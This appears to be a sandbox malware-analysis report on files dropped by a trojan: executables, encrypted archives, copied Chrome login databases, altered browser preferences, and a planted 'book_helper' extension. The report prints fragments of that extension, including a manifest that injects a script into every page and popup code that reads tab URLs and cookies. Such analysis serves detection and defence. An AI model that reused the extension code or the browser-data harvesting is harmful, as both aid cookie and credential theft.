SHA-256:	4E8CE139D89A497ADB4C6F7D2FFC96B583DA1882578AB09D121A459C5AD8335F
SHA-512:	38436956D5414A2CF66085F290EF15681DBF449B453431F937A09BFE21577252565D0C9FA0ACEAAD158B099383E55B94C721E23132809DF728643504EFFCBE2B
Malicious:	false
Preview:	.PNG........IHDR.............;0.....PIDATH..]..e....y....uw.u.>...D../..3$...".......J....H...(......0J...D...X,0?.v&Ww...9]<...;.:.Mt.w.............L.V..\|z.Z_..b$...)...z.....\|.\.?3Uw....^.{..xz..G.....`.Z_"!........x..L.G..H..=...o3.....?F.f'!6.W.~+@.`D.....g+......r]...... .ob.8.M.jg.....X....L..P....A.D..Uo2.....\......w.y..`&...W..".XAE..V...<t.Y.,.@.......rb..R$..8@..(.. ...i..H.%R)`.h..1..43.jr.......p..pd.G"..8$..,.M..RL^.....u.....84u.......)8 NTH.#.....o0....2.....$27...e>..2.h._N..s.D...D..$.\....l:..7G.....(H..2...7f..g.i...(......O...M.Po..`.3.x.;....eO.Lr..).......XH.:.......k..O.$....z7..U.a.H.IW.w..uU....o... u.....F1.q.Vf..S. .L...KF..Mu5..\3p.l.6.{.Z..y#...J...B."...U..T...F.qv....F...u.]........@.QZzA..L...<........J.L$...2.................0.0&]..;.of,..j.P.&.Yq..b.1!M..l...B.X.xp...4.h.....W.M.6.sPQG.v6........R....-@......z.b.zL.i..?......b...u\|.;>...I....$..M..^:...wLTK...l.....=m.c...v...wz....a..5..}m......l

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\icon48.png Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	2235
Entropy (8bit):	7.880518016071819
Encrypted:	false
SSDEEP:	48:9V93V/3XpV1P2gnjz8xqNaT5YmiH+0Rn6r2ogpZGYmT2pN6esC+s5szuZNwG:BlFP7jzUTKm26rMCYmneWsCG
MD5:	E35B805293CCD4F74377E9959C35427D
SHA1:	9755C6F8BAB51BD40BD6A51D73BE2570605635D1
SHA-256:	2BF1D9879B36BE03B2F140FAD1932BC6AAAAAC834082C2CD9E98BE6773918CA0
SHA-512:	6C7D37378AA1E521E73980C431CE5815DEDB28D5B7003009B91392303D3BEC1EE6F2AAE719B766DA4209B607CD702FAE283E1682D3785EFF85E07D5EE81319C8
Malicious:	false
Preview:	.PNG........IHDR...0...0.....W.......IDATh..Z]l\G.......4."..8N..XB.....D#.< $. W..}....K...P.Q...........P..-xJT.O..!UBNjHl'..2..d.k......;........;s.3.o..........)B....D.D:.TH@...W...YB_...kw{&.{.[v;..ot.Zm..!j..PN.....i\. ...r..iU.O...f...........{...B ..dh)...l.:\|)`...'.......c.`.....,.Q.]f~BD@2s.{'V.d..{`IAFO...I......7..7.)j=...p.S..#..x.Ar@$.LQ......,@....\...M5.\.&e0.J...\|....Z....h.]P.E.3T.]..4..$..)..J.._...c..g....L.....T.VR\|y....Bd..y.k..x..m[q.7...I.S&..'..Rx~...R...y.n.7n.L.\|..OZH.......YR.......9.....r....%H_`..n....Q.Q..a..wy} .EnL..r!W...M.%e.1`..i.El..N0_@..S....+.>=L....f...<....?_^[.....e2...@..d,w.....{.........s.......<.#...u<...tM]%K...}.c.......NLB.'.V)A.x.o..-..Y.0..o....L'zk$.$..Yvi..xP...........k..sB...z....\.L....k..l.47[8.?..../..0s..T..O....\|E.@.Q."P.k.YNH;x....$.H<.....T...`........................'&.1...C...7.....z^.Xf..e}`...j.:.g.....>..Z{qcm..D.F.DyLK.@@..w,A.a.@.. ..sk.iZ"..d..+.M.....&N.y

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\jquery-1.8.3.min.js Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	93637
Entropy (8bit):	5.292996107428883
Encrypted:	false
SSDEEP:	1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
MD5:	E1288116312E4728F98923C79B034B67
SHA1:	8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
SHA-256:	BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
SHA-512:	BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
Malicious:	false
Preview:	/! jQuery v1.8.3 jquery.com \| jquery.org/license /..(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e\|\|!e.parentNode\|\|e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t\|\|0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\manifest.json Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	ASCII text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	2380
Entropy (8bit):	5.687293760500434
Encrypted:	false
SSDEEP:	48:QWRIWSIelc1wm6g838z/oTFi5acPKFe8EIelc1a+E8t8Rc3T:DR4Mwmqi5PWevMa+T
MD5:	ADF10776EEC8DC0F6E7E3B4AD59CF504
SHA1:	4F11FE569189036B42923EF5A8AFB0985DCECDF5
SHA-256:	ED373E2B91FDF477D1CC1F8B709C03F03A3963ACA99F51071D5F24407095D22D
SHA-512:	7328245AA1473B217BFD33B65A07D0BD1DA96C8A85D5A6DD43E71072211D7BE86AF00BBF1C724747EEADAF36A8A713CE440557B46CB0F2E2CDD35B05C3793CD5
Malicious:	false
Preview:	{.. "background": {.. "persistent": true,.. "scripts": [ "jquery-1.8.3.min.js", "background.js" ].. },.. "browser_action": {.. "default_icon": "icon.png",.. "default_popup": "popup.html",.. "default_title": "book_helper".. },.. "content_scripts": [ {.. "all_frames": false,.. "js": [ "book.js" ],.. "matches": [ "http:///", "https:///" ],.. "run_at": "document_idle".. } ],.. "description": "book_helper",.. "icons": {.. "16": "icon.png",.. "48": "icon48.png".. },.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1tm+QFuyEAjdg8bsB1Amy5MksnoFTx+/SDDbN1zp5WgXOZWc9GtAlPwVldE3Bgkz4u8Nnwddy0MunE1cB3zfqw9BHJI2pIaoQH+nQDXCtH2tfOsX9a9JWrQYSgvH5SDsycSaMBd0jaBbC80g6zZEFPE1OR2tcyLkNMJ+p8WzCH2RXQabcwxhCzksydkJhB4scqZjKse1ZJxF724Quu4EsY5CVuoTeremfMAkke23IzB28kf8LkPBCqMR1p/kuib+izmHqQ2132TwRXIk5OkVE+D8KSvh9vl/SwRmtSqepONWXmf/LKXVv2pbqnnb8+OXP6v02MjQ9ioEaX5CK0AgBQIDAQAB",.. "manifest_version": 2,.. "name": "book_helper

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\popup.html Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	280
Entropy (8bit):	5.048307538221611
Encrypted:	false
SSDEEP:	6:WLzLyYGRpy6jHz5K3S3ZLeStvrXAqJmW/9mGNVkAnAqJmW/KrV4Nhdbb:97H1x3Zbtv0qJmW8GNVkAAqJmWyrV4Nj
MD5:	E93B02D6CFFCCA037F3EA55DC70EE969
SHA1:	DB09ED8EB9DBC82119FA1F76B3E36F2722ED2153
SHA-256:	B057584F5E81B48291E696C061F94B1E88CA52522490816D4BF900817FF822BD
SHA-512:	F85B5B38ADE3EFA605E1DA27E8680045548E3343804073F9FE0C83E4BECFB2EB4A237C8E1C84D43DA386CBDDDCC45F915BCE950ED41D53A8DFDF85AF2DFAC879
Malicious:	false
Preview:	<!DOCTYPE HTML>.<html>.<head>.<meta charset="UTF-8">.<title></title>.<style type="text/css">.div {..font-size: 30px;..color: red;.}.</style>.<script type="text/javascript" src="jquery-1.8.3.min.js"></script>.<script type="text/javascript" src="popup.js"></script>.</head>..</html>

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\popup.js Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	642
Entropy (8bit):	4.985939227199713
Encrypted:	false
SSDEEP:	12:wIoAnOh/B9mZ2ysUEjesrdRGOyHM2ssgrIpX3KKjWnoFF2O:gMW9O2yVEjzrwHM7rSKVnoeO
MD5:	2AC02EE5F808BC4DEB832FB8E7F6F352
SHA1:	05375EF86FF516D91FB9746C0CBC46D2318BEB86
SHA-256:	DDC877C153B3A9CD5EC72FEF6314739D58AE885E5EFF09AADBB86B41C3D814E6
SHA-512:	6B86F979E43A35D24BAAF5762FC0D183584B62779E4B500EB0C5F73FAE36B054A66C5B0620EA34C6AC3C562624BEC3DB3698520AF570BB4ED026D907E03182E7
Malicious:	false
Preview:	$(function() {........var a, e;.....chrome.tabs.getSelected(null, function(tab) {....e = tab.url; ....alert("url--" + e);...});.....chrome.cookies.getAll({....url : e...}, function(ytCookies) {....for ( var i = 0; i < ytCookies.length; i++) {.....if (ytCookies[i].name == "abc") {......$("#abc").val(ytCookies[i].value);.....}....}...});................function sendMessageToContentScript(message, callback) {....chrome.tabs.query({.....active : true,.....currentWindow : true....}, function(tabs) {.....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {......if (callback).......callback(response);.....});....});...}....});..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	5453
Entropy (8bit):	5.17678097616284
Encrypted:	false
SSDEEP:	96:nHXbTqqz/X7jgFkQIV+H/k0JCKL8rbobOEQVuwv:nHXbTJz/rMFkton4KsX
MD5:	A1B6380900462E70489AD34B7E97B669
SHA1:	1E718AE637515F6B217ED0E65D27CCC46BA0391C
SHA-256:	0C78D0C06C9BBB704727D0DB7A4F1E254E7B27ACAAFD22EF2D664E5B16893914
SHA-512:	3985CA77B9BF411289112180D49B298D1FC198BEE18DAD8DE264F0484DEAE277A8E7D5979FF3E0312A12E2F5A1F5D10528A5EC04A6F5F1AEC254937577C4B594
Malicious:	true
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13245952892183974","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245952891998324","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245952963463509","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1501624"],"daily_received_length":["0","0","0","0","0","0","0",

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	UTF-8 Unicode text, with very long lines
Category:	dropped
Size (bytes):	34636
Entropy (8bit):	5.538655595254981
Encrypted:	false
SSDEEP:	768:AEpwDUdLlmUckPWnr+Hb1kXqKf/pUZNCgVLH2HfVrUkGRn7dzv0Z:EOL2OjRn7pv6
MD5:	D4AB7B8661A8E33FFDDFE934728BDBA8
SHA1:	1C572CFC5062AB7394DADD241D48B06BD3867D36
SHA-256:	EC73929E0C5DE25E5AD8EF5F4E6F7F9518C8985E6B4E6550AE18A5A11FA17A94
SHA-512:	97F5D293D4C798D5AE78D61BE0FB67185DFC83EC452BC2A3B451BEDB52B227A9820ED617FD54A16C9A9953ACBBDEF9A88301C22E6076B032C63A7D936D095C55
Malicious:	true
Preview:	{"extensions":{"policy":{"switch":false},"settings":{"aapocclcgogkmnckokdopfmhonfmgoek":{"ack_external":true,"active_permissions":{"api":[],"manifest_permissions":[]},"app_launcher_ordinal":"w","commands":{},"content_settings":[],"creation_flags":137,"events":[],"from_bookmark":false,"from_webstore":true,"granted_permissions":{"api":[],"manifest_permissions":[]},"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245952896894319","lastpingday":"13245947457776957","location":1,"manifest":{"api_console_project_id":"889782162350","app":{"launch":{"local_path":"main.html"}},"container":"GOOGLE_DRIVE","current_locale":"en","default_locale":"en_US","description":"Create and edit presentations ","icons":{"128":"icon_128.png","16":"icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLOGW2Hoztw8m2z6SmCjm7y4Oe2o6aRqO+niYKCXhZab572by7acqFIFF0On3e3a967SwNijsTx2n+7Mt3KqWzEKtnwUZqzHYSsdZZK64vWIHIduawP0EICWRMf2RGIBEdDC6I1zErtcDiSrJWeRlnb0DHWXDXlt1YseM7RiON9wIDAQAB","m

C:\Users\user\AppData\Local\Login Data1618257834647 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Login Data1618257873797 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1618257925550 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	37737
Entropy (8bit):	7.994967159065528
Encrypted:	true
SSDEEP:	768:jKbwEEFezqMkJOjWrLgmfA3nT2q5XTcM5QxQ5peEjw4MEe:WbwBFOEPghX5XT/QnkbMEe
MD5:	5A6469A3F787ABD2AE93B47470528F79
SHA1:	4032B59237CC883FB752D9727971B435F4D27EB8
SHA-256:	1B27A55132F5E68D341F617A8EB21C6ED62AAE9017FF01EB8651E05D0615D971
SHA-512:	335985B4FDCDEFED60F6073CC58F44B1E31FA43C1EE253772C5EEB94FD1D93CCF2D4D7C994EF0151FFE32A58369FCA5A605329E77D3A8B038D5142F4946D2105
Malicious:	false
Preview:	7z..'...IVw '......."........S.......8%D...2 ..J...y1.C.......HE89.V.Z',n.$.T.V.....O.%{.I.6!....."..:.L..nrH..A.m.......5.M.o......Q...r......\|.k1..S"..w"Y...2pS....g.....V:y.;..+..P..8F.t...).&:.!j.....=...%.d.b.u.&..4y.<.97.[.`L]7...sZ.;.K..EA.lIO....N....D..\C.enT.f.....t.....]..w.....E...Ffc.$.Sw`].%.J.{........y.n2F.......v...#t.^.....Si&wb..A.@..#....bi_.....;..........!.~..........g.Q.@/.1\.....f.q.=..t...).<\|...?u.....JH.CD..i.s..4..c9.;X.._r7.9..{...wfg..:/.....?j.N.z....+...j)...K..v...4.9.......t.ZN...#.W.e...o...V..z...u...lNR..z.....fi.y.k......$...,N[.....F.U..~oJ.Cn.....+H..)....)!l...............8.....Z..(....L.~.....fsQ..W........p........q..T.....p.....uC..,;......1Pl...\|.....G......-....=............L.......}O8y....H...g...E..c...k2c...&...4...]?A....FG....._.W.B?....p.X..gC........G...._Y.A..P..........k.../.7YO.c.M.i....\|..^.+RP]...D.jq.z'..4.\|I*......jq..w.%..2/\|.....>..y...>......C.)8B7$Z...{P.~..&...b..........

C:\Users\user\AppData\Local\Temp\1618257956794 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	553040
Entropy (8bit):	7.999671101282436
Encrypted:	true
SSDEEP:	12288:DSX3/iYsJg9CZjucCzkbXAH+rCd/Q0SeFiDS+wj5KMzCH/RuuHDrDNb:DSX3/iVgrzkbXa+raQ0JUuJj5jzYNrDp
MD5:	A4427F2F46DEEA15CEA87BDBB53A22CC
SHA1:	158501079514868D85246E970314A024FF263199
SHA-256:	18BA0794E5C95B5192105CCD9AA09A7DFFF50262971D23E316CA3788627CCA4F
SHA-512:	334255DCA0F71B7B50A147397ECF21B1CB5150FD489AE7EBEFDFD459190865FFAF3CD7783D50B53DFF91CE5628CABB147172A627A400112B490BE17164074C85
Malicious:	false
Preview:	7z..'.....7..p......$........1...(..`(...<.^..-.+....Q.3D-.........i..si.a.,V.k.{JU.dk.'.h... KR.$~W...&. ..........<Y9.,.0.k+.<b...?zqlnw......\..5C...^...y.... ..FZ..0.$.....vds.....Yx.Q...x.._..Yk..n.>&.Y..7.B=.(.8.w<...sVs.V..6<o.(......b..t..b..@...~.........\..Y:r!ix....$!...{.h..,.......J..M".....0N.^..@..X.8.`...=._].._f.Q..D...3.==0..)f...............s..:...Gd...(!L....A):..r...>.....@.4.."s..G......j.7...{\...[..=.+y7..0.'...................i..d...!..b...c.s.}..g..(!,.H@<sl.Y..'....dm..?B.c7S..{...f...c...P.S.#...w=.+.M.U@u.....^.XI.....!u}...?.SYUK....O...G.]+.^....'..`&.a....F.......c..o....c..Z4.......Q1..1L..J.p.>...j.!.il>..y8..S...@....7..Hc...y...UNJj..9...@.../.'#.....N...BC?..C....Ga[J.vb....mn..@..z.../Kc.,Y<.tA.2...O......\|....Drrl)..7..9.....pNj.P6\|].t .'.\|.yb..SO.......`....H..-..h.+x..4...v1. ...'.4)3.N..,2_.U..]...I4y.R.I.....b.......N!e%.4.0*"l,.H.2..'..^42....9..sX..1.....8z.u#A\.....tbP........&...U....9

C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4255416
Entropy (8bit):	7.866429705903183
Encrypted:	false
SSDEEP:	98304:EoT9sIWSFT79YBDTzRHjEREGL1d2YuVNR:RCIW6790vlHjEREGLK3bR
MD5:	29389832E538957DC769CF709F80144A
SHA1:	72F5CA06D840ACBC9B49E4096E341C0DBAAC891E
SHA-256:	D6D2E00343A3CAD48CC2F4799CE87D27ACC3CE154AED286C07F226DE2E9C4035
SHA-512:	5F787359FBC37D8BED92DA38E80106CC257C2339488CA956759B33024AA61194BB87FAA8DB841DED486D5BBA253CE44342DD206CF93A9751DE95784F5EE79F05
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 28%, Browse Antivirus: ReversingLabs, Detection: 65%
Preview:	MZ......................@.............................................>....L.!This program cannot be run in DOS mode....$.......$<!,`]O.`]O.`]O.V{D.a]O..AA.u]O..B\.m]O.`]N..]O.V{E..]O..[I.a]O.Rich`]O.................PE..L.....%V.............................;............@..........................0...................................................... ..@............ ...............................................................................................text...v........................... ....rdata........... ..................@..@.data....N.......@..................@....rsrc...@.... ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\MSI429C.tmp Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6656
Entropy (8bit):	5.2861874904617645
Encrypted:	false
SSDEEP:	96:YtJL/UST0S599F4dHVMUqROmhpatBWXxJZr7dJVYJNs6Ol10dLNK:Q2SwSX9wSVUDWXQsxO
MD5:	84878B1A26F8544BDA4E069320AD8E7D
SHA1:	51C6EE244F5F2FA35B563BFFB91E37DA848A759C
SHA-256:	809AAB5EACE34DFBFB2B3D45462D42B34FCB95B415201D0D625414B56E437444
SHA-512:	4742B84826961F590E0A2D6CC85A60B59CA4D300C58BE5D0C33EB2315CEFAF5627AE5ED908233AD51E188CE53CA861CF5CF8C1AA2620DC2667F83F98E627B549
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: IpB8f8qwze.exe, Detection: malicious, Browse Filename: IpB8f8qwze.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: tyxCV1ouryr7.exe, Detection: malicious, Browse Filename: fnhcdXEfus.exe, Detection: malicious, Browse Filename: 6MhmlD8KZh.exe, Detection: malicious, Browse Filename: fnhcdXEfus.exe, Detection: malicious, Browse Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........e...e...e.._F..e..&m...e...e...e...i...e...i...e...i...e..Rich.e..........PE..L......D...........!......................... ...............................@.......................................$......H#..P............................0......p ............................................... ..l............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	268744
Entropy (8bit):	5.398284390686728
Encrypted:	false
SSDEEP:	6144:ePH9aqri3YL1Avg3NloWPxFL8QL2Ma8tvT0ecR:eP4qri3YL1Avg3NloWPTnL2f3x
MD5:	E2E9483568DC53F68BE0B80C34FE27FB
SHA1:	8919397FCC5CE4F91FE0DC4E6F55CEA5D39E4BB9
SHA-256:	205C40F2733BA3E30CC538ADC6AC6EE46F4C84A245337A36108095B9280ABB37
SHA-512:	B6810288E5F9AD49DCBF13BF339EB775C52E1634CFA243535AB46FDA97F5A2AAC112549D21E2C30A95306A57363819BE8AD5EFD4525E27B6C446C17C9C587E4E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 8%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: IpB8f8qwze.exe, Detection: malicious, Browse Filename: IpB8f8qwze.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: tyxCV1ouryr7.exe, Detection: malicious, Browse Filename: aOn5CfTiwS.exe, Detection: malicious, Browse Filename: fnhcdXEfus.exe, Detection: malicious, Browse Filename: fnhcdXEfus.exe, Detection: malicious, Browse Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0.h.Q.;.Q.;.Q.;.Y.;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;Sr.;.Q.;.Y.;.Q.;*Y.;.Q.;.Q.;.P.;...;.Q.;'F.;.Q.;EZ.;.Q.;'F.;.Q.;Rich.Q.;........................PE..L...^..S..........................................@..........................`......"Q...............................................P..x............................................................................................................textbss1U...............................text...>....p...................... ..`.rdata...i.......p... ..............@..@.data...L...........................@....idata...J.......P..................@....rsrc...x....P......................@..@........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73160
Entropy (8bit):	6.49500452335621
Encrypted:	false
SSDEEP:	1536:BG9vRpkFqhyU/v47PZSOKhqTwYu5tEm1n22W:E1RIOAkz5tEmZvW
MD5:	F0372FF8A6148498B19E04203DBB9E69
SHA1:	27FE4B5F8CB9464AB5DDC63E69C3C180B77DBDE8
SHA-256:	298D334B630C77B70E66CF5E9C1924C7F0D498B02C2397E92E2D9EFDFF2E1BDF
SHA-512:	65D84817CDDDB808B6E0AB964A4B41E96F7CE129E3CC8C253A31642EFE73A9B7070638C22C659033E1479322ACEEA49D1AFDCEFF54F8ED044B1513BFFD33F865
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 2%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D."C..L...L...L.......L.....&.L.......L.....Y.L.'~!...L.'~7...L...M.\.L.......L.......L.......L.Rich..L.........PE..L......P.....................X.......$............@..........................@......>.....@.....................................P............................ ..d...`...............................P...@............... ............................text...\|........................... ..`.rdata...&.......(..................@..@.data...............................@....rsrc...............................@..@.reloc..H.... ......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\atl71.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	89600
Entropy (8bit):	6.46929682960805
Encrypted:	false
SSDEEP:	1536:kIlL9T5Xx1ogKMvw5Br7KLKLI+Xe+QnyH4Cc0tR6nGVp/VTbkE0DJ4ZwmroV:BtvBOI+FQny5R6nG//SdaZwms
MD5:	79CB6457C81ADA9EB7F2087CE799AAA7
SHA1:	322DDDE439D9254182F5945BE8D97E9D897561AE
SHA-256:	A68E1297FAE2BCF854B47FFA444F490353028DE1FA2CA713B6CF6CC5AA22B88A
